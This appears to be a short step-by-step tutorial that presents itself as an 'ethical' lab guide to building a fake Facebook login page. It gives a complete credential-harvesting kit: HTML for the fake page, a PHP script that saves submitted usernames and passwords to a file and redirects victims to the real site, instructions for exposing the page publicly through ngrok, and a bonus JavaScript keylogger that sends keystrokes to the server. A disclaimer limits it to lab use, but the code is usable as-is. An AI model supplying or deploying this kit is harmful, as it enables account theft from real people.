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Ethical Phishing Page Guide (No XAMPP – Windows + PHP + Ngrok)

By Lucy – For Educational & Lab Use Only

Folder Structure

```
phishing/
├─ login.html ← Fake login page
├─ log.php ← Logs credentials
├─ credentials.txt ← Auto-created after capture
```

♦ Step 1: Create login.html

```
<!DOCTYPE html>
<html>
<head>
    <title>Facebook Login</title>
</head>
<body>
    <h2>Facebook Login</h2>
    <form action="log.php" method="POST">
        <input type="text" name="username" placeholder="Email"><br>
        <input type="password" name="password" placeholder="Password"><br>
        <button type="submit">Login</button>
        </form>
</body>
</html>
```

♦ Step 2: Create log.php

```
<?php
$file = fopen("credentials.txt", "a");
fwrite($file, "User: " . $_POST['username'] . " | Pass: " . $_POST['password'] .
"\n");
fclose($file);
header("Location: https://facebook.com"); // Redirect after capture
exit;
?>
```

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Step 3: Host Locally (Without XAMPP)

For Windows Users

1. Download PHP ZIP from: https://windows.php.net/download/

Choose "VS16 x64 Thread Safe"

- 2. Extract to: C:\php
- 3. Add C:\php to System PATH:
 - Windows Search > "Environment Variables" > Edit Path > Add C:\php
- 4. Open cmd, check PHP:

```
php -v
```

Tor Linux Users (Debian/Ubuntu)

```
sudo apt update
sudo apt install php php-cli
php -v
```

☑ Done! Now you can host PHP pages.

♦ Step 4: Start the Server

```
cd path/to/phishing
php -S localhost:8080
```

Then visit:

http://localhost:8080/login.html

Step 5: Make it Public with Ngrok

Download Ngrok from: https://ngrok.com/download

Then run:

ngrok http 8080

Copy the link it gives:

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https://random-id.ngrok.io/login.html



Step 6: Test the Page

- 1. Open link
- 2. Submit any data
- 3. Check credentials.txt captured info will appear

Bonus: Add Keylogger (Optional)

```
<script>
document.onkeypress = function(e) {
  fetch("log.php?key=" + e.key);
</script>
```

Legal Use Only

Use only in testing labs like DVWA, TryHackMe, or local environments. Misuse = Illegal and punishable.





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